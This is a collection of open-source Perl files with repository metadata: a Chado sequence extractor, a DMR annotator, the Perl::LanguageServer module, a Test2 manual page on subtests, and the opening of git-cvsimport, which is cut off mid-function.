ed8f2342a6907be6f409a4c684af3b2c0c468b4b | 5,228 | pl | Perl | chado/extract_sequence_by_id.pl | CSynodinos/biocode | 3d4813f6cbf2aed6b15f7778244a3192b48cb3fb | ["MIT"] | null | null | null | chado/extract_sequence_by_id.pl | ypc123456/biocode | e27d7cda916c88fe20e2e437bc3adcd1ce2e3dcf | ["MIT"] | 43 | 2015-03-20T08:40:14.000Z | 2022-03-09T22:37:38.000Z | chado/extract_sequence_by_id.pl | ypc123456/biocode | e27d7cda916c88fe20e2e437bc3adcd1ce2e3dcf | ["MIT"] | 217 | 2015-01-29T08:40:33.000Z | 2022-03-26T19:23:45.000Z |
#!/usr/bin/env perl
=head1 NAME
extract_sequence_by_id.pl - extract the sequence of a feature in Chado by its ID. Currently this
is limited to feature.uniquename, but will be expanded as needed.
=head1 SYNOPSIS
USAGE: extract_sequence_by_id.pl
--database=eha3
--user=someuser
--password=somepass
[ --uniquename=eha3.assembly.3425.1
--database_type=mysql
--server=yourserverhost
--output_file=/path/to/somefile.fsa
--log=/path/to/some.log ]
=head1 OPTIONS
B<--database,-d>
Database name to connect to.
B<--user,-u>
User account with select privileges on the specified database.
B<--password,-p>
Password for user account specified.
B<--uniquename,-n>
Optional. One method of identifying sequences to extract. Corresponds to feature.uniquename
B<--database_type>
Optional. Database type (vendor.) Currently supports 'mysql' or 'postgresql' (default = mysql).
B<--server,-s>
Optional. Database server to connect to (default = localhost).
B<--output_file,-o>
Optional. Can specify the output file (default = STDOUT).
B<--log,-l>
Optional. Full path to a log file to create.
B<--help,-h>
This help message
=head1 DESCRIPTION
The goal of this script is to allow the extraction of the sequence of any feature in a Chado
database. Currently rather limited, it allows selection by feature.uniquename value only
from a MySQL or Pg database.
=head1 INPUT
Required input includes the information necessary to connect to the database as well as
feature identifying info. Current methods include:
uniquename - the value in the feature.uniquename field.
This assumes that feature.residues is also populated. The methods for access will
expand as needed.
=head1 OUTPUT
Features will be exported in FASTA format either on STDOUT or to a file (if --output_file is
passed)
Each FASTA sequence line contains 60 characters.
=head1 CONTACT
Joshua Orvis
jorvis@gmail.com
=cut
use strict;
use DBI;
use Getopt::Long qw(:config no_ignore_case no_auto_abbrev pass_through);
use Pod::Usage;
$|++;
my %options = ();
my $results = GetOptions (\%options,
'database|d=s',
'user|u=s',
'password|p=s',
'uniquename|n=s',
'database_type|a=s',
'server|s=s',
'output_file|o=s',
'log|l=s',
'help|h') || pod2usage();
## display documentation
if( $options{'help'} ){
pod2usage( {-exitval => 0, -verbose => 2, -output => \*STDERR} );
}
## make sure everything passed was peachy
&check_parameters(\%options);
## open the log if requested
my $logfh;
if (defined $options{log}) {
open($logfh, ">$options{log}") || die "can't create log file: $!";
}
_log("connecting to the database.");
my $dsn = '';
if ( $options{database_type} eq 'mysql' ) {
$dsn = "dbi:mysql:database=$options{database};host=$options{server}";
} elsif ( $options{database_type} eq 'postgresql' ) {
$dsn = "DBI:Pg:dbname=$options{database};host=$options{server}";
}
_log("attempting to create database connection");
my $dbh = DBI->connect($dsn, $options{user}, $options{password}, {PrintError=>1, RaiseError=>1} );
## manage the output file
my $ofh;
if ( $options{output_file} ) {
open($ofh, ">$options{output_file}") || die "failed to create output file: $!";
} else {
$ofh = *STDOUT;
}
## whatever method is used to pull sequences needs to result in the following columns (@results):
# 0. identifier 1. descriptive name (optional) 2. sequence
my $qry;
my @qry_opts = ();
my @results;
if ( $options{uniquename} ) {
$qry = qq{
SELECT uniquename, '', residues
FROM feature
WHERE uniquename = ?
};
push @qry_opts, $options{uniquename};
}
my $dsh = $dbh->prepare($qry);
$dsh->execute(@qry_opts);
while ( my $row = $dsh->fetchrow_arrayref ) {
@results = @$row;
last;
}
$dsh->finish();
if ( scalar(@results) == 3 ) {
print $ofh ">$results[0] $results[1]\n";
## format in lines of length 60
while ($results[2] =~ /(.{1,60})/g) {
print $ofh "$1\n";
}
print $ofh "\n";
} else {
die("failed to find a sequence with the passed criteria");
}
$dbh->disconnect();
exit(0);
sub _log {
my $msg = shift;
print $logfh "$msg\n" if $logfh;
}
sub check_parameters {
my $options = shift;
## make sure required arguments were passed
my @required = qw( database user password );
for my $option ( @required ) {
unless ( defined $$options{$option} ) {
die "--$option is a required option";
}
}
## one of the following must be passed
unless ( defined $$options{uniquename} ) {
die "you must define IDs to extract using the --uniquename option."
}
## handle some defaults
$$options{server} = 'localhost' unless defined $$options{server};
$$options{database_type} = 'mysql' unless defined $$options{database_type};
}
| 23.443946 | 101 | 0.619931 |
ed7dd05a61e5d9c78bc786b2e9a190be885df664 | 2,935 | pl | Perl | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | ["MIT"] | null | null | null | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | ["MIT"] | null | null | null | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | ["MIT"] | null | null | null |
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Long;
use FindBin qw($Bin $Script);
use PerlIO::gzip;
my $usage=<<"USAGE";
name: $0
usage: perl $0
This script is used to annotate DMRs with genomic elements (including promoter, CGI, or any others you provide).
-DMR DMR file (bed format);
chr1 start end ...
-annot list of annotation infomation file (bed format);
#example for list file:
promoter path/promoter.bed
CGI path/CGI.bed
5utr path/5utr.bed
exon path/exon.bed
#format of promoter.bed :
chr1 start end ID annotation +
-help
example : perl $0 -DMR in.dmr -annot annot.list > in.dmr.annt.txt
author: luhanlin\@genomics.org.cn
date:
USAGE
my ($dmrfile, $annotlist, $help);
GetOptions (
"DMR=s" => \$dmrfile,
"annot=s" => \$annotlist,
"help" => \$help,
);
die $usage if $help;
die $usage unless $dmrfile && $annotlist;
my $getoverlap = "$Bin/disposeOverlap.pl";
#
print STDERR "|-- reading DMR file: $dmrfile ..\n";
my $tmp = "tmp.dmr.txt";
# my @head = ();
open DMR, $dmrfile or die $!;
open OUT, "> $tmp" or die $!;
while(<DMR>){
chomp;
if(/^#/){
next;
}
else{
my $dmrID = "DMR$.";
print OUT "$dmrID\t$_\n";
# @head = split(/\t/, $_);
}
}
close DMR;
close OUT;
#
my %res = ();
my @list = ();
print STDERR "|-- reading annotation file list ..\n";
open IN, $annotlist or die $!;
while(<IN>){
chomp;
my @aa = split(/\t/, $_);
my $name = $aa[0];
push @list, $name;
my $file = $aa[1];
my $output = "tmp.$name.overlap";
print STDERR "|-- overlap with ELEMENT: $name, \n\tfile: $file, \n\toutput: $output ..\n";
system("$getoverlap --i1 $tmp --f1 1-0-2-3 --i2 $file --f2 0-4-1-2 --OL 0.5-small --mN 1 --E O > $output");
print STDERR "|-- parse output: $output ..\n";
open IB, "$output" or die $!;
while(<IB>){
chomp;
next if $.==1;
my @bb = split;
my $dmrid = $bb[1];
my %u = ();
foreach my $ele (@bb[8..$#bb]){
my $id = (split(/:/, $ele))[0];
$u{$id} += 1;
}
my $annot_id = join(",", keys %u);
$res{$dmrid}{$name} = $annot_id;
}
close IB;
print STDERR "|-- remove output: $output ..\n";
system("rm -f $output");
}
close IN;
#
print STDERR "|-- write the result ..\n";
open IA, $tmp or die $!;
print join("\t", "chr", "start", "end", "q-value", "methyl-diff", "CpGs", "methyl_a", "methyl_b", @list), "\n";
while(<IA>){
chomp;
my @aa = split(/\t/, $_);
my $dmrid = $aa[0];
my @out = ();
foreach my $name (@list){
my $o = $res{$dmrid}{$name} ? $res{$dmrid}{$name} : "--";
push @out, $o;
}
print join("\t", @aa[1..$#aa], @out), "\n";
}
close IA;
system("rm -f $tmp");
print STDERR "|-- program is done .. \n\n\n";
# END
| 24.256198 | 115 | 0.517547 |
73ec87700b4b928a5a3737f458d4ef2fdcf102ce | 18,708 | pm | Perl | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | ["MIT"] | null | null | null | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | ["MIT"] | null | null | null | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | ["MIT"] | null | null | null |
package Perl::LanguageServer;
use v5.18;
use strict ;
use Moose ;
use Moose::Util qw( apply_all_roles );
use Coro ;
use Coro::AIO ;
use Coro::Handle ;
use AnyEvent;
use AnyEvent::Socket ;
use JSON ;
use Data::Dump qw{dump} ;
use IO::Select ;
use Perl::LanguageServer::Req ;
use Perl::LanguageServer::Workspace ;
with 'Perl::LanguageServer::Methods' ;
with 'Perl::LanguageServer::IO' ;
no warnings 'uninitialized' ;
=head1 NAME
Perl::LanguageServer - Language Server and Debug Protocol Adapter for Perl
=head1 VERSION
Version 2.0.2
=cut
our $VERSION = '2.0.2';
=head1 SYNOPSIS
This is a Language Server and Debug Protocol Adapter for Perl
It implements the Language Server Protocol, which provides
syntax checking, symbol search, etc. for Perl to various editors, for
example Visual Studio Code or Atom.
L<https://microsoft.github.io/language-server-protocol/specification>
It also implements the Debug Adapter Protocol, which allows debugging
from various editors and IDEs.
L<https://microsoft.github.io/debug-adapter-protocol/overview>
To use both with Visual Studio Code, install the extension "perl".
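Because C<run()> simply reads its options from C<@ARGV>, the server can also
be started by hand, e.g. to listen on a TCP port for debug adapter
connections (the port number below is only an example):

    perl -MPerl::LanguageServer -e 'Perl::LanguageServer::run' -- --port 13603
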
Any comments and patches are welcome.
NOTE: This module uses Compiler::Lexer. The version on CPAN (0.22) is buggy and
crashes from time to time. For this reason a working version from GitHub
is bundled with this module and will be installed when you run Makefile.PL.
L<https://github.com/goccy/p5-Compiler-Lexer>
=cut
our $json = JSON -> new -> utf8(1) -> ascii(1) ;
our $jsonpretty = JSON -> new -> utf8(1) -> ascii(1) -> pretty (1) ;
our %running_reqs ;
our %running_coros ;
our $exit ;
our $workspace ;
our $dev_tool ;
our $debug1 = 0 ;
our $debug2 = 0 ;
our $client_version ;
has 'channel' =>
(
is => 'ro',
isa => 'Coro::Channel',
default => sub { Coro::Channel -> new }
) ;
has 'debug' =>
(
is => 'rw',
isa => 'Int',
default => 1,
) ;
has 'listen_port' =>
(
is => 'rw',
isa => 'Maybe[Int]',
) ;
has 'roles' =>
(
is => 'rw',
isa => 'HashRef',
default => sub { {} },
) ;
has 'out_semaphore' =>
(
is => 'ro',
isa => 'Coro::Semaphore',
default => sub { Coro::Semaphore -> new }
) ;
has 'log_prefix' =>
(
is => 'rw',
isa => 'Str',
default => 'LS',
) ;
has 'log_req_txt' =>
(
is => 'rw',
isa => 'Str',
default => '---> Request: ',
) ;
# ---------------------------------------------------------------------------
sub logger
{
my $self = shift ;
my $src ;
if (!defined ($_[0]) || ref ($_[0]))
{
$src = shift ;
}
$src = $self if (!$src) ;
print STDERR $src?$src -> log_prefix . ': ':'', @_ ;
}
# ---------------------------------------------------------------------------
sub send_notification
{
my ($self, $notification, $src, $txt) = @_ ;
$txt ||= "<--- Notification: " ;
$notification -> {jsonrpc} = '2.0' ;
my $outdata = $json -> encode ($notification) ;
my $guard = $self -> out_semaphore -> guard ;
use bytes ;
my $len = length($outdata) ;
my $wrdata = "Content-Length: $len\r\nContent-Type: application/vscode-jsonrpc; charset=utf-8\r\n\r\n$outdata" ;
$self -> _write ($wrdata) ;
if ($debug1)
{
$wrdata =~ s/\r//g ;
$self -> logger ($src, $txt, $jsonpretty -> encode ($notification), "\n") if ($debug1) ;
}
}
# ---------------------------------------------------------------------------
sub call_method
{
my ($self, $reqdata, $req, $id) = @_ ;
my $method = $req -> is_dap?$reqdata -> {command}:$reqdata -> {method} ;
my $module ;
my $name ;
if ($method =~ /^(\w+)\/(\w+)$/)
{
$module = $1 ;
$name = $2 ;
}
elsif ($method =~ /^(\w+)$/)
{
$name = $1 ;
}
elsif ($method =~ /^\$\/(\w+)$/)
{
$name = $1 ;
}
else
{
die "Unknown methd $method" ;
}
$module = $req -> type eq 'dbgint'?'DebugAdapterInterface':'DebugAdapter' if ($req -> is_dap) ;
my $base_package = __PACKAGE__ . '::Methods' ;
my $package = $base_package ;
$package .= '::' . $module if ($module) ;
my $fn = $package . '.pm' ;
$fn =~ s/::/\//g ;
if (!exists $INC{$fn} || !exists $self -> roles -> {$fn})
{
#$self -> logger (dump (\%INC), "\n") ;
$self -> logger ("apply_all_roles ($self, $package, $fn)\n") ;
apply_all_roles ($self, $package) ;
$self -> roles -> {$fn} = 1 ;
}
my $perlmethod ;
if ($req -> is_dap)
{
$perlmethod = '_dapreq_' . $name ;
}
else
{
$perlmethod = (defined($id)?'_rpcreq_':'_rpcnot_') . $name ;
}
$self -> logger ("method=$perlmethod\n") if ($debug1) ;
die "Unknow perlmethod $perlmethod" if (!$self -> can ($perlmethod)) ;
no strict ;
return $self -> $perlmethod ($workspace, $req) ;
use strict ;
}
# ---------------------------------------------------------------------------
sub process_req
{
my ($self, $id, $reqdata) = @_ ;
$running_coros{$id} = async
{
my $req_guard = Guard::guard
{
delete $running_reqs{$id} ;
delete $running_coros{$id} ;
};
my $type = $reqdata -> {type} ;
my $is_dap = $type?1:0 ;
$type = defined ($id)?'request':'notification' if (!$type) ;
$self -> logger ("handle_req id=$id\n") if ($debug1) ;
my $req = Perl::LanguageServer::Req -> new ({ id => $id, is_dap => $is_dap, type => $type, params => $is_dap?$reqdata -> {arguments} || {}:$reqdata -> {params}}) ;
$running_reqs{$id} = $req ;
my $rsp ;
my $outdata ;
my $outjson ;
eval
{
$rsp = $self -> call_method ($reqdata, $req, $id) ;
$id = undef if (!$rsp) ;
if ($req -> is_dap)
{
$outjson = { request_seq => -$id, seq => -$id, command => $reqdata -> {command}, success => JSON::true, type => 'response', $rsp?(body => $rsp):()} ;
}
else
{
$outjson = { id => $id, jsonrpc => '2.0', result => $rsp} if ($rsp) ;
}
$outdata = $json -> encode ($outjson) if ($outjson) ;
} ;
if ($@)
{
$self -> logger ("ERROR: $@\n") ;
if ($req -> is_dap)
{
$outjson = { request_seq => -$id, command => $reqdata -> {command}, success => JSON::false, message => "$@", , type => 'response'} ;
}
else
{
$outjson = { id => $id, jsonrpc => '2.0', error => { code => -32001, message => "$@" }} ;
}
$outdata = $json -> encode ($outjson) if ($outjson) ;
}
if (defined($id))
{
my $guard = $self -> out_semaphore -> guard ;
use bytes ;
my $len = length ($outdata) ;
my $wrdata = "Content-Length: $len\r\nContent-Type: application/vscode-jsonrpc; charset=utf-8\r\n\r\n$outdata" ;
my $sum = 0 ;
my $cnt ;
while ($sum < length ($wrdata))
{
$cnt = $self -> _write ($wrdata, undef, $sum) ;
die "write_error ($!)" if ($cnt <= 0) ;
$sum += $cnt ;
}
if ($debug1)
{
$wrdata =~ s/\r//g ;
$self -> logger ("<--- Response: ", $jsonpretty -> encode ($outjson), "\n") ;
}
}
cede () ;
} ;
}
# ---------------------------------------------------------------------------
sub mainloop
{
my ($self) = @_ ;
my $buffer = '' ;
while (!$exit)
{
use bytes ;
my %header ;
my $line ;
my $cnt ;
my $loop ;
header:
while (1)
{
$self -> logger ("start aio read\n") if ($debug2) ;
$cnt = $self -> _read (\$buffer, 8192, length ($buffer), undef, 1) ;
$self -> logger ("end aio read cnt=$cnt\n") if ($debug2) ;
die "read_error reading headers ($!)" if ($cnt < 0) ;
return if ($cnt == 0) ;
while ($buffer =~ s/^(.*?)\R//)
{
$line = $1 ;
$self -> logger ("line=<$line>\n") if ($debug2) ;
last header if ($line eq '') ;
$header{$1} = $2 if ($line =~ /(.+?):\s*(.+)/) ;
}
$loop = 1 ;
}
my $len = $header{'Content-Length'} ;
return 1 if ($len == 0);
my $data ;
#$self -> logger ("len=$len len buffer=", length ($buffer), "\n") if ($debug2) ;
while ($len > length ($buffer))
{
$cnt = $self -> _read (\$buffer, $len - length ($buffer), length ($buffer)) ;
#$self -> logger ("cnt=$cnt len=$len len buffer=", length ($buffer), "\n") if ($debug2) ;
die "read_error reading data ($!)" if ($cnt < 0) ;
return if ($cnt == 0) ;
}
if ($len == length ($buffer))
{
$data = $buffer ;
$buffer = '' ;
}
elsif ($len < length ($buffer))
{
$data = substr ($buffer, 0, $len) ;
$buffer = substr ($buffer, $len) ;
}
else
{
die "to few data bytes" ;
}
$self -> logger ("read data=", $data, "\n") if ($debug2) ;
$self -> logger ("read header=", dump (\%header), "\n") if ($debug2) ;
my $reqdata ;
$reqdata = $json -> decode ($data) if ($data) ;
if ($debug1)
{
$self -> logger ($self -> log_req_txt, $jsonpretty -> encode ($reqdata), "\n") ;
}
my $id = $reqdata -> {type}?-$reqdata -> {seq}:$reqdata -> {id};
$self -> process_req ($id, $reqdata) ;
cede () ;
}
return 1 ;
}
# ---------------------------------------------------------------------------
sub _run_tcp_server
{
my ($listen_port) = @_ ;
if ($listen_port)
{
my $quit ;
while (!$quit && !$exit)
{
logger (undef, "tcp server start listen on port $listen_port\n") ;
my $tcpcv = AnyEvent::CondVar -> new ;
my $guard ;
eval
{
$guard = tcp_server '127.0.0.1', $listen_port, sub
{
my ($fh, $host, $port) = @_ ;
async
{
eval
{
$fh = Coro::Handle::unblock ($fh) ;
my $self = Perl::LanguageServer -> new ({out_fh => $fh, in_fh => $fh, log_prefix => 'DAx'});
$self -> logger ("connect from $host:$port\n") ;
$self -> listen_port ($listen_port) ;
$quit = $self -> mainloop () ;
$self -> logger ("got quit signal\n") if ($quit) ;
} ;
logger (undef, $@) if ($@) ;
if ($fh)
{
close ($fh) ;
$fh = undef ;
}
$tcpcv -> send if ($quit || $exit);
} ;
} ;
} ;
if (!$@)
{
$tcpcv -> recv ;
}
else
{
$guard = undef ;
logger (undef, $@) ;
#$quit = 1 ;
if (!$guard && ($@ =~ /Address already in use/))
{
# stop other server
tcp_connect '127.0.0.1', $listen_port, sub
{
my ($fh) = @_ ;
syswrite ($fh, "Content-Length: 0\r\n\r\n") if ($fh) ;
} ;
}
$@ = undef ;
Coro::AnyEvent::sleep (1) ;
exit (1) ; # stop LS, vscode will restart it
}
}
}
}
# ---------------------------------------------------------------------------
sub run
{
my $listen_port ;
my $no_stdio ;
my $heartbeat ;
while (my $opt = shift @ARGV)
{
if ($opt eq '--debug')
{
$debug1 = $debug2 = 1 ;
}
elsif ($opt eq '--log-level')
{
$debug1 = shift @ARGV ;
$debug2 = $debug1 > 1?1:0 ;
}
elsif ($opt eq '--port')
{
$listen_port = shift @ARGV ;
}
elsif ($opt eq '--nostdio')
{
$no_stdio = 1 ;
}
elsif ($opt eq '--heartbeat')
{
$heartbeat = 1 ;
}
elsif ($opt eq '--version')
{
$client_version = shift @ARGV ;
}
}
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
if ($heartbeat)
{
async
{
my $i = 0 ;
while (1)
{
print STDERR "#####$i\n" ;
Coro::AnyEvent::sleep (3) ;
$i++ ;
}
} ;
}
if (!$no_stdio)
{
async
{
my $self = Perl::LanguageServer -> new ({out_fh => 1, in_fh => 0});
$self -> mainloop () ;
$cv -> send ;
} ;
}
async
{
_run_tcp_server ($listen_port) ;
} ;
$cv -> recv ;
$exit = 1 ;
}
# ---------------------------------------------------------------------------
sub parsews
{
my $class = shift ;
my @args = @_ ;
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
async
{
my $self = Perl::LanguageServer -> new ;
$workspace = Perl::LanguageServer::Workspace -> new ({ config => {} }) ;
my %folders ;
foreach my $path (@args)
{
$folders{$path} = $path ;
}
$workspace -> folders (\%folders) ;
$workspace -> background_parser ($self) ;
$cv -> send ;
} ;
$cv -> recv ;
}
# ---------------------------------------------------------------------------
sub check_file
{
my $class = shift ;
my @args = @_ ;
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
my $self = Perl::LanguageServer -> new ;
$workspace = Perl::LanguageServer::Workspace -> new ({ config => {} }) ;
async
{
my %folders ;
foreach my $path (@args)
{
$folders{$path} = $path ;
}
$workspace -> folders (\%folders) ;
$workspace -> background_checker ($self) ;
$cv -> send ;
} ;
async
{
foreach my $path (@args)
{
my $text ;
aio_load ($path, $text) ;
$workspace -> check_perl_syntax ($workspace, $path, $text) ;
}
} ;
$cv -> recv ;
}
=pod
=head1 AUTHOR
grichter, C<< <richter at ecos.de> >>
=head1 BUGS
Please report any bugs or feature requests to C<bug-perl-languageserver at rt.cpan.org>, or through
the web interface at L<http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Perl-LanguageServer>. I will be notified, and then you'll
automatically be notified of progress on your bug as I make changes.
=head1 SUPPORT
You can find documentation for this module with the perldoc command.
perldoc Perl::LanguageServer
You can also look for information at:
=over 4
=item * Github:
L<https://github.com/richterger/Perl-LanguageServer>
=item * RT: CPAN's request tracker (report bugs here)
L<http://rt.cpan.org/NoAuth/Bugs.html?Dist=Perl-LanguageServer>
=item * AnnoCPAN: Annotated CPAN documentation
L<http://annocpan.org/dist/Perl-LanguageServer>
=item * CPAN Ratings
L<http://cpanratings.perl.org/d/Perl-LanguageServer>
=item * Search CPAN
L<http://search.cpan.org/dist/Perl-LanguageServer/>
=back
=head1 ACKNOWLEDGEMENTS
=head1 LICENSE AND COPYRIGHT
Copyright 2018-2020 grichter.
This program is free software; you can redistribute it and/or modify it
under the terms of the the Artistic License (2.0). You may obtain a
copy of the full license at:
L<http://www.perlfoundation.org/artistic_license_2_0>
Any use, modification, and distribution of the Standard or Modified
Versions is governed by this Artistic License. By using, modifying or
distributing the Package, you accept this license. Do not use, modify,
or distribute the Package, if you do not accept this license.
If your Modified Version has been derived from a Modified Version made
by someone other than you, you are nevertheless required to ensure that
your Modified Version complies with the requirements of this license.
This license does not grant you the right to use any trademark, service
mark, tradename, or logo of the Copyright Holder.
This license includes the non-exclusive, worldwide, free-of-charge
patent license to make, have made, use, offer to sell, sell, import and
otherwise transfer the Package with respect to any patent claims
licensable by the Copyright Holder that are necessarily infringed by the
Package. If you institute patent litigation (including a cross-claim or
counterclaim) against any party alleging that the Package constitutes
direct or contributory patent infringement, then this Artistic License
to you shall terminate on the date that such litigation is filed.
Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER
AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES.
THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE, OR NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY
YOUR LOCAL LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR
CONTRIBUTOR WILL BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR
CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
=cut
1; # End of Perl::LanguageServer
| 26.956772 | 172 | 0.461621 |
ed98712ff8336b90e27a3eddbc8c82143302ca53 | 4,049 | pm | Perl | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | ["Apache-2.0"] | null | null | null | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | ["Apache-2.0"] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | ["Apache-2.0"] | null | null | null |
package Test2::Manual::Tooling::Subtest;
use strict;
use warnings;
our $VERSION = '0.000129';
1;
__END__
=head1 NAME
Test2::Manual::Tooling::Subtest - How to implement a tool that makes use of
subtests.
=head1 DESCRIPTION
Subtests are a nice way of making related events visually and architecturally
distinct.
=head1 WHICH TYPE OF SUBTEST DO I NEED?
There are 2 types of subtest. The first type is subtests with user-supplied
coderefs, such as the C<subtest()> function itself. The second type is subtest
that do not have any user supplied coderefs.
So which type do you need? The answer to that is simple: if you are going to
let the user define the subtest with their own codeblock, you have the first
type, otherwise you have the second.
In either case, you will still need to use the same API function:
C<Test2::API::run_subtest>.
=head2 SUBTEST WITH USER SUPPLIED CODEREF
This example will emulate the C<subtest> function.
use Test2::API qw/context run_subtest/;
sub my_subtest {
my ($name, $code) = @_;
# Like any other tool, you need to acquire a context, if you do not then
# things will not report the correct file and line number.
my $ctx = context();
my $bool = run_subtest($name, $code);
$ctx->release;
return $bool;
}
This looks incredibly simple... and it is. C<run_subtest()> does all the hard
work for you. This will issue an L<Test2::Event::Subtest> event with the
results of the subtest. The subtest event itself will report to the proper file
and line number due to the context you acquired (even though it does not I<look>
like you used the context).
C<run_subtest()> can take additional arguments:
run_subtest($name, $code, \%params, @args);
=over 4
=item @args
This allows you to pass arguments into the codeblock that gets run.
=item \%params
This is a hashref of parameters. Currently there are 3 possible parameters:
=over 4
=item buffered => $bool
This will turn the subtest into the new style buffered subtest. This type of
subtest is recommended, but not default.
=item inherit_trace => $bool
This is used for tool-side coderefs.
=item no_fork => $bool
This controls whether the subtest machinery should detect and react to
forking/threading inside the subtest itself. In general you are
unlikely to need/want this parameter.
=back
=back
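For example (an illustrative call only, assuming C<run_subtest> is imported
from L<Test2::API> and C<is()> from your usual Test2 tools), parameters and
codeblock arguments can be combined like this:

    my $pass = run_subtest(
        'addition works',
        sub { my ($x, $y) = @_; is($x + $y, 4, "got 4") },
        {buffered => 1},
        2, 2,
    );
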
=head2 SUBTEST WITH TOOL-SIDE CODEREF
This is particularly useful if you want to turn a tool that wraps other tools
into a subtest. For this we will be using the tool we created in
L<Test2::Manual::Tooling::Nesting>.
use Test2::API qw/context run_subtest/;
sub check_class {
my $class = shift;
my $ctx = context();
my $code = sub {
my $obj = $class->new;
is($obj->foo, 'foo', "got foo");
is($obj->bar, 'bar', "got bar");
};
my $bool = run_subtest($class, $code, {buffered => 1, inherit_trace => 1});
$ctx->release;
return $bool;
}
The C<run_subtest()> function does all the heavy lifting for us. All we need
to do is give the function a name, a coderef to run, and the
C<< inherit_trace => 1 >> parameter. The C<< buffered => 1 >> parameter is
optional, but recommended.
The C<inherit_trace> parameter tells the subtest tool that the contexts acquired
inside the nested tools should use the same trace as the subtest itself. For
user-supplied codeblocks you do not use inherit_trace because you want errors
to report to the user-supplied file+line.
=head1 SEE ALSO
L<Test2::Manual> - Primary index of the manual.
=head1 SOURCE
The source code repository for Test2-Manual can be found at
F<https://github.com/Test-More/Test2-Suite/>.
=head1 MAINTAINERS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 AUTHORS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 COPYRIGHT
Copyright 2018 Chad Granum E<lt>exodist@cpan.orgE<gt>.
This program is free software; you can redistribute it and/or
modify it under the same terms as Perl itself.
See F<http://dev.perl.org/licenses/>
=cut
# ----- git-2.4.0/git-cvsimport.perl (from riritn1111/heroku_app) -----
#!/usr/bin/perl
# This tool is copyright (c) 2005, Matthias Urlichs.
# It is released under the Gnu Public License, version 2.
#
# The basic idea is to aggregate CVS check-ins into related changes.
# Fortunately, "cvsps" does that for us; all we have to do is to parse
# its output.
#
# Checking out the files is done by a single long-running CVS connection
# / server process.
#
# The head revision is on branch "origin" by default.
# You can change that with the '-o' option.
use 5.008;
use strict;
use warnings;
use Getopt::Long;
use File::Spec;
use File::Temp qw(tempfile tmpnam);
use File::Path qw(mkpath);
use File::Basename qw(basename dirname);
use Time::Local;
use IO::Socket;
use IO::Pipe;
use POSIX qw(strftime tzset dup2 ENOENT);
use IPC::Open2;
use Git qw(get_tz_offset);
$SIG{'PIPE'}="IGNORE";
set_timezone('UTC');
our ($opt_h,$opt_o,$opt_v,$opt_k,$opt_u,$opt_d,$opt_p,$opt_C,$opt_z,$opt_i,$opt_P, $opt_s,$opt_m,@opt_M,$opt_A,$opt_S,$opt_L, $opt_a, $opt_r, $opt_R);
my (%conv_author_name, %conv_author_email, %conv_author_tz);
sub usage(;$) {
my $msg = shift;
print(STDERR "Error: $msg\n") if $msg;
print STDERR <<END;
usage: git cvsimport # fetch/update GIT from CVS
[-o branch-for-HEAD] [-h] [-v] [-d CVSROOT] [-A author-conv-file]
[-p opts-for-cvsps] [-P file] [-C GIT_repository] [-z fuzz] [-i] [-k]
[-u] [-s subst] [-a] [-m] [-M regex] [-S regex] [-L commitlimit]
[-r remote] [-R] [CVS_module]
END
exit(1);
}
sub read_author_info($) {
my ($file) = @_;
my $user;
open my $f, '<', "$file" or die("Failed to open $file: $!\n");
while (<$f>) {
# Expected format is this:
# exon=Andreas Ericsson <ae@op5.se>
if (m/^(\S+?)\s*=\s*(.+?)\s*<(.+)>\s*$/) {
$user = $1;
$conv_author_name{$user} = $2;
$conv_author_email{$user} = $3;
}
# or with an optional timezone:
# spawn=Simon Pawn <spawn@frog-pond.org> America/Chicago
elsif (m/^(\S+?)\s*=\s*(.+?)\s*<(.+)>\s*(\S+?)\s*$/) {
$user = $1;
$conv_author_name{$user} = $2;
$conv_author_email{$user} = $3;
$conv_author_tz{$user} = $4;
}
# However, we also read from CVSROOT/users format
# to ease migration.
elsif (/^(\w+):(['"]?)(.+?)\2\s*$/) {
my $mapped;
($user, $mapped) = ($1, $3);
if ($mapped =~ /^\s*(.*?)\s*<(.*)>\s*$/) {
$conv_author_name{$user} = $1;
$conv_author_email{$user} = $2;
}
elsif ($mapped =~ /^<?(.*)>?$/) {
$conv_author_name{$user} = $user;
$conv_author_email{$user} = $1;
}
}
# NEEDSWORK: Maybe warn on unrecognized lines?
}
close ($f);
}
sub write_author_info($) {
my ($file) = @_;
open my $f, '>', $file or
